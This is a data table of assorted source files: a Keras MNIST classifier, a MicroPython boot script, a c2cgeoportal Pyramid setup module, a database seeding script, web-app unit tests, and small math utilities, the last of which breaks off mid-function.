text string | size int64 | token_count int64 |
|---|---|---|
import numpy as np
import keras
import keras.layers as layers
from get_mnist import get_mnist_preproc
### --- hyperparameters --- ###
epochs = 48
batch_size = 64
num_classes = 10
reg = 3e-3  # L2 weight-decay strength shared by every regularized layer
### --- hyperparams end --- ###
### --- setup data --- ###
traini, trainl, vali, vall, testi, testl = get_mnist_preproc()
# One-hot encode the labels.  Pass num_classes explicitly so every split
# gets the same label width even if a class happens to be absent from one.
trainl = keras.utils.to_categorical(trainl, num_classes=num_classes)
vall = keras.utils.to_categorical(vall, num_classes=num_classes)
testl = keras.utils.to_categorical(testl, num_classes=num_classes)
### --- end setup --- ###
### --- define model --- ###
# Small CNN: two 3x3 conv layers (8 filters each), a 2x2 max-pool, two more
# conv layers, then a softmax classifier.  All kernels carry L2 regularization.
model = keras.Sequential()
model.add(
    layers.Conv2D(
        input_shape=traini.shape[1:],
        activation='relu',
        filters=8,
        kernel_size=3,
        padding='same',
        kernel_regularizer=keras.regularizers.l2(reg)
    )
)
model.add(
    layers.Conv2D(
        activation='relu',
        filters=8,
        kernel_size=3,
        padding='same',
        kernel_regularizer=keras.regularizers.l2(reg)
    )
)
model.add(layers.MaxPooling2D(pool_size=2))
model.add(
    layers.Conv2D(
        activation='relu',
        filters=8,
        kernel_size=3,
        padding='same',
        kernel_regularizer=keras.regularizers.l2(reg)
    )
)
model.add(
    layers.Conv2D(
        activation='relu',
        filters=8,
        kernel_size=3,
        padding='same',
        kernel_regularizer=keras.regularizers.l2(reg)
    )
)
model.add(layers.Flatten())
model.add(
    layers.Dense(
        num_classes,
        activation='softmax',
        kernel_regularizer=keras.regularizers.l2(reg)
    )
)
### --- end definition --- ###
### --- training --- ###
model.compile(
    optimizer='adam',
    loss='categorical_crossentropy',
    metrics=['accuracy']
)
# Score untrained model (baseline should be near-chance accuracy).
scores_untrained = model.evaluate(testi, testl, verbose=1)
history = model.fit(
    traini, trainl,
    epochs=epochs,
    batch_size=batch_size,
    validation_data=(vali, vall),
    shuffle=True
)
print('Test loss untrained:', scores_untrained[0])
print('Test accuracy untrained:', scores_untrained[1])
# Score trained model.
scores = model.evaluate(testi, testl, verbose=1)
print('Test loss:', scores[0])
print('Test accuracy:', scores[1])
### --- end training --- ###
### --- save model --- ###
model.summary()
# Make sure the output directory exists before writing (was a silent
# prerequisite before).
import os
os.makedirs('./mnist', exist_ok=True)
json_string = model.to_json()
with open('./mnist/mnist_model.json', 'w') as file:
    file.write(json_string + '\n')
model.save_weights('./mnist/mnist_weights.hdf5')
### --- end save --- ###
| 2,529 | 921 |
import config
import controller
import hwrtc
import network
import web_server
import wlan
def main():
    """Boot sequence: connect WLAN (when credentials are configured),
    synchronize the clocks, arm the pump/LED interrupts, and start the
    web UI once the WLAN actually obtained an IP address."""
    if config.wlan_ssid and config.wlan_password:
        wlan.initialize_wlan()
        wlan.connect_to_wlan()
    hwrtc.initialize_hwrtc()
    hwrtc.initialize_ds3231()
    hwrtc.synchronize_hwrtc_ds3231()
    controller.register_pump_led_interrupt_handlers()
    online = (
        config.wlan_ssid
        and config.wlan_password
        and wlan.wlan.status() == network.STAT_GOT_IP
    )
    if online:
        web_server.start_web_server()


main()
| 539 | 198 |
# -*- coding: utf-8 -*-
# Copyright (c) 2011-2016, Camptocamp SA
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# The views and conclusions contained in the software and documentation are those
# of the authors and should not be interpreted as representing official policies,
# either expressed or implied, of the FreeBSD Project.
import logging
import sqlalchemy
import sqlahelper
import pyramid_tm
import mimetypes
import c2c.template
from urlparse import urlsplit
import simplejson as json
from socket import gethostbyname, gaierror
from ipcalc import IP, Network
import importlib
from pyramid_mako import add_mako_renderer
from pyramid.interfaces import IStaticURLInfo
from pyramid.httpexceptions import HTTPException
from papyrus.renderers import GeoJSON, XSD
from c2cgeoportal import stats
from c2cgeoportal.resources import FAModels
from c2cgeoportal.lib import dbreflection, get_setting, caching, \
C2CPregenerator, MultiDomainStaticURLInfo
log = logging.getLogger(__name__)

# used by (sql|form)alchemy
# Module-level globals: filled in by includeme() from the application
# settings and read by the model/formalchemy modules at import time.
srid = None
schema = None
parentschema = None
formalchemy_language = None
formalchemy_default_zoom = 10
formalchemy_default_x = 740000
formalchemy_default_y = 5860000
formalchemy_available_functionalities = []
formalchemy_available_metadata = []

# Header predicate to accept only JSON content
# OL/cgxp are not setting the correct content type for JSON. We have to accept
# XML as well even though JSON is actually sent.
JSON_CONTENT_TYPE = "Content-Type:application/(?:json|xml)"
class DecimalJSON:
    """Pyramid renderer factory producing JSON (with Decimal support via
    simplejson's ``use_decimal``) and optional JSONP wrapping when the
    configured callback query parameter is present."""

    def __init__(self, jsonp_param_name="callback"):
        self.jsonp_param_name = jsonp_param_name

    def __call__(self, info):
        def _render(value, system):
            body = json.dumps(value, use_decimal=True)
            request = system.get("request")
            if request is None:
                return body
            callback = request.params.get(self.jsonp_param_name)
            if callback is None:
                request.response.content_type = "application/json"
                return body
            # JSONP: wrap the payload in the requested callback function.
            request.response.content_type = "text/javascript"
            return "%(callback)s(%(json)s);" % {
                "callback": callback,
                "json": body,
            }
        return _render
# Interface type identifiers.  Note NGEO and NGEO_CATALOGUE share a value.
INTERFACE_TYPE_CGXP = "cgxp"
INTERFACE_TYPE_NGEO = "ngeo"
INTERFACE_TYPE_NGEO_CATALOGUE = "ngeo"


def add_interface(
    config, interface_name=None, interface_type=INTERFACE_TYPE_CGXP, **kwargs
):  # pragma: nocover
    """Register the routes and views of one UI interface.

    CGXP: a ``None`` interface_name registers the default "main" interface
    at "/" and "/viewer.js"; a named interface is served under its own
    name-based paths.  NGEO: the "desktop" interface is mounted at "/",
    every other one under "/<name>".  ``**kwargs`` is accepted but unused.
    """
    if interface_type == INTERFACE_TYPE_CGXP:
        if interface_name is None:
            add_interface_cgxp(
                config,
                interface_name="main",
                route_names=("home", "viewer"),
                routes=("/", "/viewer.js"),
                renderers=("index.html", "viewer.js"),
            )
        else:
            add_interface_cgxp(
                config,
                interface_name=interface_name,
                route_names=(interface_name, interface_name + ".js"),
                routes=("/%s" % interface_name, "/%s.js" % interface_name),
                renderers=("/%s.html" % interface_name, "/%s.js" % interface_name),
            )
    elif interface_type == INTERFACE_TYPE_NGEO:
        route = "/" if interface_name == "desktop" else "/%s" % interface_name
        add_interface_ngeo(
            config,
            interface_name=interface_name,
            route_name=interface_name,
            route=route,
            renderer="/%s.html" % interface_name,
        )
def add_interface_cgxp(config, interface_name, route_names, routes, renderers):  # pragma: nocover
    """Register the index, permalink-theme and viewer.js routes/views of a
    CGXP interface."""
    # Imported here (not at module level) to avoid loading the model too early.
    from c2cgeoportal.views.entry import Entry

    def add_interface(f):
        # View decorator: tags the request with the interface name.
        def new_f(root, request):
            request.interface_name = interface_name
            return f(root, request)
        return new_f

    config.add_route(route_names[0], routes[0])
    config.add_view(
        Entry,
        decorator=add_interface,
        attr="get_cgxp_index_vars",
        route_name=route_names[0],
        renderer=renderers[0]
    )
    # permalink theme: recover the theme for generating custom viewer.js url
    config.add_route(
        "%stheme" % route_names[0],
        "%s%stheme/*themes" % (routes[0], "" if routes[0][-1] == "/" else "/"),
    )
    config.add_view(
        Entry,
        decorator=add_interface,
        attr="get_cgxp_permalinktheme_vars",
        route_name="%stheme" % route_names[0],
        renderer=renderers[0]
    )
    # viewer.js: GET only; the pregenerator makes URLs vary per role.
    config.add_route(
        route_names[1], routes[1],
        request_method="GET",
        pregenerator=C2CPregenerator(role=True),
    )
    config.add_view(
        Entry,
        decorator=add_interface,
        attr="get_cgxp_viewer_vars",
        route_name=route_names[1],
        renderer=renderers[1]
    )
# Guard so the ngeo static views are only registered once even when several
# ngeo interfaces are added.
ngeo_static_init = False


def add_interface_ngeo(config, interface_name, route_name, route, renderer):  # pragma: nocover
    """Register the index and permalink-theme routes/views of an ngeo
    interface, plus (once per process) the ngeo static views."""
    # Imported here (not at module level) to avoid loading the model too early.
    from c2cgeoportal.views.entry import Entry

    def add_interface(f):
        # View decorator: tags the request with the interface name.
        def new_f(root, request):
            request.interface_name = interface_name
            return f(root, request)
        return new_f

    config.add_route(route_name, route, request_method="GET")
    config.add_view(
        Entry,
        decorator=add_interface,
        attr="get_ngeo_index_vars",
        route_name=route_name,
        renderer=renderer
    )
    # permalink theme: recover the theme for generating custom viewer.js url
    config.add_route(
        "%stheme" % route_name,
        "%s%stheme/*themes" % (route, "" if route[-1] == "/" else "/"),
        request_method="GET",
    )
    config.add_view(
        Entry,
        decorator=add_interface,
        attr="get_ngeo_permalinktheme_vars",
        route_name="%stheme" % route_name,
        renderer=renderer
    )
    global ngeo_static_init
    if not ngeo_static_init:
        add_static_view_ngeo(config)
        ngeo_static_init = True
def add_static_view_ngeo(config):  # pragma: nocover
    """ Add the project static view for ngeo """
    package = config.get_settings()["package"]
    _add_static_view(config, "proj-ngeo", "%s:static-ngeo" % package)
    config.override_asset(
        to_override="c2cgeoportal:project/",
        override_with="%s:static-ngeo/" % package
    )
    config.add_static_view(
        name=package,
        path="%s:static" % package,
        cache_max_age=int(config.get_settings()["default_max_age"])
    )
    # node_modules / closure library locations come from the settings;
    # these views are not cache-busted.
    config.add_static_view("node_modules", config.get_settings().get("node_modules_path"))
    config.add_static_view("closure", config.get_settings().get("closure_library_path"))
    # serve .less stylesheets with a CSS content type
    mimetypes.add_type("text/css", ".less")
def add_admin_interface(config):
    """Register the formalchemy admin UI, but only when the
    ``enable_admin_interface`` setting is truthy."""
    if not config.get_settings().get("enable_admin_interface", False):
        return
    config.formalchemy_admin(
        route_name="admin",
        package=config.get_settings()["package"],
        view="fa.jquery.pyramid.ModelView",
        factory=FAModels
    )
def add_static_view(config):
    """Register the CGXP "proj" static view and override the project assets
    with the application package's own static directory."""
    pkg = config.get_settings()["package"]
    _add_static_view(config, "proj", pkg + ":static")
    config.override_asset(
        to_override="c2cgeoportal:project/",
        override_with=pkg + ":static/"
    )
# Names of the static views registered through _add_static_view; consumed by
# the cache-version machinery.
CACHE_PATH = []


def _add_static_view(config, name, path):
    """Register a static view with cache busting and record its name."""
    # Imported lazily to avoid a circular import at module load.
    from c2cgeoportal.lib.cacheversion import version_cache_buster
    config.add_static_view(
        name=name,
        path=path,
        cache_max_age=int(config.get_settings()["default_max_age"]),
    )
    config.add_cache_buster(path, version_cache_buster)
    CACHE_PATH.append(unicode(name))  # NOTE: Python 2 ``unicode``
def locale_negotiator(request):
    """Pick the request language from the ``lang`` query parameter, falling
    back to the best Accept-Language match (or the configured default)."""
    lang = request.params.get("lang")
    if lang is not None:
        return lang
    settings = request.registry.settings
    # best_match falls back to default_locale_name when nothing matches
    return request.accept_language.best_match(
        settings.get("available_locale_names"),
        default_match=settings.get("default_locale_name"))
def _match_url_start(ref, val):
"""
Checks that the val URL starts like the ref URL.
"""
ref_parts = ref.rstrip("/").split("/")
val_parts = val.rstrip("/").split("/")[0:len(ref_parts)]
return ref_parts == val_parts
def _is_valid_referer(referer, settings):
    """Return True when ``referer`` starts like one of the configured
    ``authorized_referers`` URLs; an empty/missing referer is invalid.

    Fix: the original shadowed the ``list`` builtin with a local name.
    """
    if not referer:
        return False
    authorized = settings.get("authorized_referers", [])
    return any(_match_url_start(ref, referer) for ref in authorized)
def _create_get_user_from_request(settings):
    """Build the ``request.user`` property getter, closed over the
    application ``settings`` (used for the referer check)."""
    def get_user_from_request(request):
        """ Return the User object for the request.
        Return ``None`` if:
        * user is anonymous
        * it does not exist in the database
        * the referer is invalid
        """
        from c2cgeoportal.models import DBSession, User
        # disable the referer check for the admin interface
        # NOTE: ``and`` binds tighter than ``or``, i.e. this reads
        # (admin and no-referer) or valid-referer.
        if not (
            request.path_info_peek() == "admin" and request.referer is None or
            _is_valid_referer(request.referer, settings)
        ):
            if request.referer is not None:
                log.warning("Invalid referer for %s: %s", request.path_qs,
                            repr(request.referer))
            return None
        # Cache the database lookup on the request object.
        if not hasattr(request, "_user"):
            request._user = None
            username = request.authenticated_userid
            if username is not None:
                # We know we will need the role object of the
                # user so we use joined loading
                request._user = DBSession.query(User) \
                    .filter_by(username=username) \
                    .first()
        return request._user
    return get_user_from_request
def set_user_validator(config, user_validator):
    """ Call this function to register a user validator function.

    The validator function is passed three arguments: ``request``,
    ``username``, and ``password``. The function should return the
    user name if the credentials are valid, and ``None`` otherwise.

    The validator should not do the actual authentication operation
    by calling ``remember``, this is handled by the ``login`` view.
    """
    def _register():
        config.registry.validate_user = user_validator

    # Defer the registration through the config action machinery.
    config.action("user_validator", _register)
def default_user_validator(request, username, password):
    """
    Validate the username/password. This is c2cgeoportal's
    default user validator.
    Return none if we are anonymous, the string to remember otherwise.
    """
    # Imported here to avoid loading the model at module import time.
    from c2cgeoportal.models import DBSession, User
    user = DBSession.query(User).filter_by(username=username).first()
    # validate_password is only consulted when the user row exists.
    return username if user and user.validate_password(password) else None
class OgcproxyRoutePredicate:
    """ Serve as a custom route predicate function for ogcproxy.
    We do not want the OGC proxy to be used to reach the app's
    mapserv script. We just return False if the url includes
    "mapserv". It is rather drastic, but works for us. """
    # NOTE(review): the docstring mentions a "mapserv" check, but the code
    # below only filters private/loopback networks — confirm intent.

    def __init__(self, val, config):
        # RFC 1918 / loopback ranges the proxy must never be able to reach.
        self.private_networks = [
            Network("127.0.0.0/8"),
            Network("10.0.0.0/8"),
            Network("172.16.0.0/12"),
            Network("192.168.0.0/16"),
        ]

    def __call__(self, context, request):
        # Reject requests without a target URL, with an unresolvable host,
        # or whose host resolves into a private network (SSRF protection).
        url = request.params.get("url")
        if url is None:
            return False

        parts = urlsplit(url)
        try:
            ip = IP(gethostbyname(parts.netloc))
        except gaierror as e:
            log.info("Unable to get host name for %s: %s" % (url, e))
            return False
        for net in self.private_networks:
            if ip in net:
                return False
        return True

    def phash(self):  # pragma: nocover
        return ""
class MapserverproxyRoutePredicate:
    """ Serve as a custom route predicate function for mapserverproxy.
    If the hide_capabilities setting is set and is true then we want to
    return 404s on GetCapabilities requests."""

    def __init__(self, val, config):
        pass

    def __call__(self, context, request):
        hide_capabilities = request.registry.settings.get("hide_capabilities")
        if not hide_capabilities:
            return True
        # Case-insensitive view of the query parameters.
        # NOTE: ``unicode``/``iteritems`` make this Python-2-only code.
        params = dict(
            (k.lower(), unicode(v).lower()) for k, v in request.params.iteritems()
        )
        return "request" not in params or params["request"] != u"getcapabilities"

    def phash(self):
        return ""
def add_cors_route(config, pattern, service):
    """
    Add the OPTIONS route and view need for services supporting CORS.
    """
    route_name = pattern + "_options"
    config.add_route(route_name, pattern, request_method="OPTIONS")

    def view(request):  # pragma: nocover
        # Imported lazily to avoid a circular import at module load.
        from c2cgeoportal.lib.caching import set_common_headers, NO_CACHE
        return set_common_headers(request, service, NO_CACHE)

    config.add_view(view, route_name=route_name)
def error_handler(http_exception, request):  # pragma: nocover
    """
    View callable for handling all the exceptions that are not already handled.
    """
    log.warning("%s returned status code %s", request.url,
                http_exception.status_code)
    # Re-serve the exception itself as the response body, uncached.
    return caching.set_common_headers(
        request, "error", caching.NO_CACHE, http_exception, vary=True
    )
def call_hook(settings, name, *args, **kwargs):
    """Look up hook ``name`` in ``settings["hooks"]`` — a dotted
    ``package.module.function`` path — import it and invoke it with the
    given arguments.  No-op when the hook is not configured."""
    hook_path = settings.get("hooks", {}).get(name)
    if hook_path is None:
        return
    module_path, _, attr = hook_path.rpartition(".")
    hook = getattr(importlib.import_module(module_path), attr)
    hook(*args, **kwargs)
def includeme(config):
    """ This function returns a Pyramid WSGI application.

    Reads the YAML application config into the settings, initializes the
    database engine, renderers and caching, then registers every route and
    view of the c2cgeoportal application on ``config``.
    """
    # update the settings object from the YAML application config file
    settings = config.get_settings()
    settings.update(c2c.template.get_config(settings.get("app.cfg")))
    call_hook(settings, "after_settings", settings)
    # These module-level globals are re-assigned from the settings below.
    global srid
    global schema
    global parentschema
    global formalchemy_language
    global formalchemy_default_zoom
    global formalchemy_default_x
    global formalchemy_default_y
    global formalchemy_available_functionalities
    global formalchemy_available_metadata
    # reified ``request.user`` property (see _create_get_user_from_request)
    config.add_request_method(_create_get_user_from_request(settings),
                              name="user", property=True)
    # configure 'locale' dir as the translation dir for c2cgeoportal app
    config.add_translation_dirs("c2cgeoportal:locale/")
    # initialize database
    engine = sqlalchemy.engine_from_config(
        settings,
        "sqlalchemy.")
    sqlahelper.add_engine(engine)
    config.include(pyramid_tm.includeme)
    config.include("pyramid_closure")
    # initialize the dbreflection module
    dbreflection.init(engine)
    # dogpile.cache configuration
    caching.init_region(settings["cache"])
    caching.invalidate_region()
    # Register a tween to get back the cache buster path.
    config.add_tween("c2cgeoportal.lib.cacheversion.CachebusterTween")
    # bind the mako renderer to other file extensions
    add_mako_renderer(config, ".html")
    add_mako_renderer(config, ".js")
    config.include("pyramid_chameleon")
    # add the "geojson" renderer
    config.add_renderer("geojson", GeoJSON())
    # add decimal json renderer
    config.add_renderer("decimaljson", DecimalJSON())
    # add the "xsd" renderer
    config.add_renderer("xsd", XSD(
        sequence_callback=dbreflection._xsd_sequence_callback
    ))
    # add the set_user_validator directive, and set a default user
    # validator
    config.add_directive("set_user_validator", set_user_validator)
    config.set_user_validator(default_user_validator)
    if settings.get("ogcproxy_enable", False):  # pragma: nocover
        # add an OGCProxy view
        config.add_route_predicate("ogc_server", OgcproxyRoutePredicate)
        config.add_route(
            "ogcproxy", "/ogcproxy",
            ogc_server=True
        )
        config.add_view("papyrus_ogcproxy.views:ogcproxy", route_name="ogcproxy")
    # add routes to the mapserver proxy
    config.add_route_predicate("mapserverproxy", MapserverproxyRoutePredicate)
    config.add_route(
        "mapserverproxy", "/mapserv_proxy",
        mapserverproxy=True, pregenerator=C2CPregenerator(role=True),
    )
    # add route to the tinyows proxy
    config.add_route(
        "tinyowsproxy", "/tinyows_proxy",
        pregenerator=C2CPregenerator(role=True),
    )
    # add routes to csv view
    config.add_route("csvecho", "/csv", request_method="POST")
    # add route to the export GPX/KML view
    config.add_route("exportgpxkml", "/exportgpxkml")
    # add routes to the echo service
    config.add_route("echo", "/echo", request_method="POST")
    # add routes to the entry view class
    config.add_route("base", "/", static=True)
    config.add_route("loginform", "/login.html", request_method="GET")
    # every login-related endpoint gets a CORS OPTIONS twin
    add_cors_route(config, "/login", "login")
    config.add_route("login", "/login", request_method="POST")
    add_cors_route(config, "/logout", "login")
    config.add_route("logout", "/logout", request_method="GET")
    add_cors_route(config, "/loginchange", "login")
    config.add_route("loginchange", "/loginchange", request_method="POST")
    add_cors_route(config, "/loginresetpassword", "login")
    config.add_route("loginresetpassword", "/loginresetpassword", request_method="POST")
    add_cors_route(config, "/loginuser", "login")
    config.add_route("loginuser", "/loginuser", request_method="GET")
    config.add_route("testi18n", "/testi18n.html", request_method="GET")
    config.add_route("apijs", "/api.js", request_method="GET")
    config.add_route("xapijs", "/xapi.js", request_method="GET")
    config.add_route("apihelp", "/apihelp.html", request_method="GET")
    config.add_route("xapihelp", "/xapihelp.html", request_method="GET")
    config.add_route(
        "themes", "/themes",
        request_method="GET",
        pregenerator=C2CPregenerator(role=True),
    )
    config.add_route("invalidate", "/invalidate", request_method="GET")
    # checker routes, Checkers are web services to test and assess that
    # the application is correctly functioning.
    # These web services are used by tools like (nagios).
    config.add_route("checker_routes", "/checker_routes", request_method="GET")
    config.add_route("checker_lang_files", "/checker_lang_files", request_method="GET")
    config.add_route("checker_pdf3", "/checker_pdf3", request_method="GET")
    config.add_route("checker_fts", "/checker_fts", request_method="GET")
    config.add_route("checker_theme_errors", "/checker_theme_errors", request_method="GET")
    config.add_route("checker_phantomjs", "/checker_phantomjs", request_method="GET")
    # collector
    config.add_route("check_collector", "/check_collector", request_method="GET")
    # print proxy routes
    config.add_route("printproxy", "/printproxy", request_method="HEAD")
    add_cors_route(config, "/printproxy/*all", "print")
    config.add_route(
        "printproxy_capabilities", "/printproxy/capabilities.json",
        request_method="GET", pregenerator=C2CPregenerator(role=True),
    )
    config.add_route(
        "printproxy_report_create", "/printproxy/report.{format}",
        request_method="POST", header=JSON_CONTENT_TYPE
    )
    config.add_route(
        "printproxy_status", "/printproxy/status/{ref}.json",
        request_method="GET"
    )
    config.add_route(
        "printproxy_cancel", "/printproxy/cancel/{ref}",
        request_method="DELETE"
    )
    config.add_route(
        "printproxy_report_get", "/printproxy/report/{ref}",
        request_method="GET"
    )
    # full text search routes
    add_cors_route(config, "/fulltextsearch", "fulltextsearch")
    config.add_route("fulltextsearch", "/fulltextsearch")
    # Access to raster data
    add_cors_route(config, "/raster", "raster")
    config.add_route("raster", "/raster", request_method="GET")
    add_cors_route(config, "/profile.{ext}", "profile")
    config.add_route("profile.csv", "/profile.csv", request_method="POST")
    config.add_route("profile.json", "/profile.json", request_method="POST")
    # shortener
    config.add_route("shortener_create", "/short/create", request_method="POST")
    config.add_route("shortener_get", "/short/{ref}", request_method="GET")
    # Geometry processing
    config.add_route("difference", "/difference", request_method="POST")
    # PDF report tool
    config.add_route("pdfreport", "/pdfreport/{layername}/{id}", request_method="GET")
    # add routes for the "layers" web service
    add_cors_route(config, "/layers/*all", "layers")
    config.add_route(
        "layers_count", "/layers/{layer_id:\\d+}/count",
        request_method="GET"
    )
    config.add_route(
        "layers_metadata", "/layers/{layer_id:\\d+}/md.xsd",
        request_method="GET",
        pregenerator=C2CPregenerator(role=True),
    )
    config.add_route(
        "layers_read_many",
        "/layers/{layer_id:\\d+,?(\\d+,)*\\d*$}",
        request_method="GET")  # supports URLs like /layers/1,2,3
    config.add_route(
        "layers_read_one", "/layers/{layer_id:\\d+}/{feature_id}",
        request_method="GET")
    config.add_route(
        "layers_create", "/layers/{layer_id:\\d+}",
        request_method="POST", header=JSON_CONTENT_TYPE)
    config.add_route(
        "layers_update", "/layers/{layer_id:\\d+}/{feature_id}",
        request_method="PUT", header=JSON_CONTENT_TYPE)
    config.add_route(
        "layers_delete", "/layers/{layer_id:\\d+}/{feature_id}",
        request_method="DELETE")
    config.add_route(
        "layers_enumerate_attribute_values",
        "/layers/{layer_name}/values/{field_name}",
        request_method="GET",
        pregenerator=C2CPregenerator(),
    )
    # there's no view corresponding to that route, it is to be used from
    # mako templates to get the root of the "layers" web service
    config.add_route("layers_root", "/layers/", request_method="HEAD")
    # Resource proxy (load external url, useful when loading non https content)
    config.add_route("resourceproxy", "/resourceproxy", request_method="GET")
    # pyramid_formalchemy's configuration
    config.include("pyramid_formalchemy")
    config.include("fa.jquery")
    # define the srid, schema and parentschema
    # as global variables to be usable in the model
    srid = settings["srid"]
    schema = settings["schema"]
    parentschema = settings["parentschema"]
    formalchemy_default_zoom = get_setting(
        settings,
        ("admin_interface", "map_zoom"), formalchemy_default_zoom)
    formalchemy_default_x = get_setting(
        settings,
        ("admin_interface", "map_x"), formalchemy_default_x)
    formalchemy_default_y = get_setting(
        settings,
        ("admin_interface", "map_y"), formalchemy_default_y)
    formalchemy_available_functionalities = get_setting(
        settings,
        ("admin_interface", "available_functionalities"),
        formalchemy_available_functionalities)
    formalchemy_available_metadata = get_setting(
        settings,
        ("admin_interface", "available_metadata"),
        formalchemy_available_metadata)
    config.add_route("checker_all", "/checker_all", request_method="GET")
    config.add_route("version_json", "/version.json", request_method="GET")
    stats.init(config)
    # scan view decorator for adding routes
    config.scan(ignore=["c2cgeoportal.tests", "c2cgeoportal.scripts"])
    config.registry.registerUtility(
        MultiDomainStaticURLInfo(), IStaticURLInfo)
    # add the static view (for static resources)
    _add_static_view(config, "static", "c2cgeoportal:static")
    _add_static_view(config, "project", "c2cgeoportal:project")
    add_admin_interface(config)
    add_static_view(config)
    # Handles the other HTTP errors raised by the views. Without that,
    # the client receives a status=200 without content.
    config.add_view(error_handler, context=HTTPException)
| 25,480 | 7,879 |
import sys
import pathlib
from datetime import datetime
current_dir = pathlib.Path(__file__).resolve().parent
sys.path.append( str(current_dir) + '/../../' )
from app.database import BASE, ENGINE, session_scope
from app.models.todos import Todo
from app.models.users import User
def generate_seed_data():
    """Create all tables and insert the demo users and their todos."""
    BASE.metadata.create_all(ENGINE)
    user_names = ["太郎"], ["次郎"], ["花子"]
    todo_rows = [
        (1, "title1", "description1", datetime.now()),
        (1, "title2", "description2", datetime.now()),
        (2, "title3", "description3", datetime.now()),
        (2, "title4", "description4", datetime.now()),
        (3, "title5", "description5", datetime.now()),
        (3, "title6", "description6", datetime.now()),
    ]
    with session_scope() as session:
        for (name,) in user_names:
            session.add(User(name))
        for user_id, title, description, deadline in todo_rows:
            session.add(Todo(
                user_id=user_id,
                title=title,
                description=description,
                deadline=deadline
            ))


if __name__ == "__main__":
    generate_seed_data()
| 1,102 | 347 |
# -*- coding: UTF-8 -*-
import os
import os.path
import json
import platform
import tempfile
import logging
if platform.python_version() < '2.7':
import unittest2 as unittest
else:
import unittest
from rogue_scores.web import app
from rogue_scores.web.app import index, scores_upload, scores_json
class FakeRequest(object):
    # Minimal stand-in for the web framework's request object used by the
    # views under test: only ``form``, ``headers`` and ``args`` are exposed.
    # Class attribute: tests override this JSON payload before instantiating.
    scores = '[]'

    def __init__(self, *args, **kwargs):
        self.form = {'scores': FakeRequest.scores}
        self.headers = {}
        self.args = {}


# Silence the app's logging during the tests.
app.app.logger.handlers = [logging.FileHandler('/dev/null')]
class TestRogueWeb(unittest.TestCase):
    """Tests for the web views; the app's request object and scores file
    are monkey-patched per test and restored in tearDown."""

    def setUp(self):
        # Save the originals so tearDown can restore them.
        self._scores = app.app.config['SCORES']
        self._req = app.request
        # Each test works on its own temporary scores file.
        self.tmp = tempfile.NamedTemporaryFile(delete=False)
        app.request = FakeRequest()
        app.app.config['SCORES'] = self.tmp.name
        self.json = json.dumps([
            {'user': 'foo', 'level': 42, 'cause': 'bar',
             'status': 'killed', 'score': 24},
            {'user': 'moo', 'level': 25, 'cause': 'qwe',
             'status': 'killed', 'score': 255}
        ]).encode('utf-8')
        self.tmp.write(self.json)
        self.tmp.close()

    def tearDown(self):
        app.app.config['SCORES'] = self._scores
        app.request = self._req
        if os.path.isfile(self.tmp.name):
            os.unlink(self.tmp.name)

    def getScores(self):
        # Parse the scores file as the app would see it.
        with open(self.tmp.name) as f:
            return json.loads(f.read())

    # == .index == #
    def test_index_no_score(self):
        # With no scores file the rendered table should be empty.
        os.unlink(self.tmp.name)
        with app.app.app_context():
            ret = index()
            self.assertRegexpMatches(ret, r'</th>\s*</tr>\s*</table>')

    # == .scores_upload == #
    def test_scores_upload_wrong_json(self):
        FakeRequest.scores = '}w$'
        app.request = FakeRequest()
        with app.app.app_context():
            ret = scores_upload()
            self.assertEquals('wrong json', ret)

    def test_scores_upload_no_scores(self):
        FakeRequest.scores = '[]'
        app.request = FakeRequest()
        with app.app.app_context():
            ret = scores_upload()
            self.assertEquals('ok', ret)

    def test_scores_upload_new_scores(self):
        # The upload parses "killed by a <cause> on level <n>" into fields.
        FakeRequest.scores = '[["myname", 50, "killed by a foo on level 43"]]'
        app.request = FakeRequest()
        with app.app.app_context():
            ret = scores_upload()
            self.assertEquals('ok', ret)
        d = {'user': 'myname', 'level': 43,
             'status': 'killed', 'cause': 'foo', 'score': 50}
        self.assertEquals(d, self.getScores()[0])

    # == .scores_json == #
    def test_scores_json(self):
        with app.app.app_context():
            resp = scores_json()
            self.assertEquals(json.loads(self.json.decode('utf-8')),
                              json.loads(resp.data.decode('utf-8')))

    def test_scores_pretty_json(self):
        # ?pretty=1 must produce indented output with identical content.
        app.request = self._req
        with app.app.test_request_context('/scores?pretty=1'):
            resp = scores_json()
            txt = resp.data.decode('utf-8')
            self.assertEquals(json.loads(self.json.decode('utf-8')),
                              json.loads(txt))
            self.assertRegexpMatches(txt, '^\[\n +\{')
| 3,217 | 1,093 |
from math import factorial

# Number of k-permutations of n items, P(n, k) = n! / (n-k)!,
# reduced modulo 10**6.
n = 86
k = 8
# Fixes: integer floor division and an *integer* modulus — the original
# ``% 1e6`` coerced the huge intermediate to float (precision hazard), and
# the Python-2 ``print`` statement was a syntax error on Python 3.
res = factorial(n) // factorial(n - k) % 10 ** 6
print(int(res))
| 95 | 45 |
"""
Investment
created by Herman Tai 3/20/2008
"""
from math import *
# Two floats closer than this are considered equal.
TOLERANCE = 0.0000001


def equals(n1, n2):
    """Approximate float equality: True when n1 and n2 differ by less
    than TOLERANCE."""
    diff = n1 - n2
    return -TOLERANCE < diff < TOLERANCE
def calculate_monthly_payment(principle, year, rate_percent):
    """Monthly payment amortizing ``principle`` over ``year`` years at the
    given annual percentage rate.  A 0% rate is handled explicitly."""
